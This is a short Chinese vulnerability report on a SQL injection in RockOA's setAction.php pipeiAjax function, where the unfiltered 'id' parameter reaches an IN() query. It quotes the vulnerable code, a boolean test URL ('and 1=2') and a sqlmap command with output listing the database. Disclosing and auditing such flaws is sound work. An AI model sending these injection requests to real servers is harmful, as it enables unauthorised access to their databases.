/webrock/flow/set/setAction.php
代码如下:
public function pipeiAjax()
{
$sid = $this->request('id'); //未过滤
$rows = m('flow_set')->getall("`id` in($sid) and `isflow`=1 and `table` is not null order by `sort`", 'num');
$str = '';
$mess = '';//邮件内容
$naes = '';
foreach($rows as $k=>$rsss){
$flow = f($rsss['num']);
$arrs = $flow->reloadpipei();
$str .= ''.($k+1).'、'.$arrs[0];
}
echo $str;
}
关于参数传递可以看
/include/View.php 这个里面就是参数传递
访问这个URL,需要登入
http://localhost/rock.php?a=pipei&d=flow&m=set&ajaxbool=true&id=1
返回:
1、[请假条]共记录6条,重新匹配(0)条,异常(0)条,完成(0)条。
http://localhost/rock.php?a=pipei&d=flow&m=set&ajaxbool=true&id=1 and 1=2
返回:无内容
用sqlmap神器:
sqlmap.py -r cj.txt -p id --dbs
反回:
[11:52:53] [INFO] falling back to current database
[11:52:53] [INFO] fetching current database
[11:52:53] [INFO] retrieved: rockoa
available databases [1]: rockoa
这是我审计出的一个漏洞,希望可以通过
|
|